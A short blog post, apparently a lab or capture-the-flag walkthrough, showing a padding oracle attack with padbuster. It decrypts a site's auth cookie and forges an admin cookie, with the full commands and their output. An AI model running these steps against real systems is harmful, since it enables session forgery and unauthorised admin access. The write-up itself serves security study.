1) Obtain the suspicious cookie. In this case, the cookie is:
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy
2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------
3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
No comments:
Post a Comment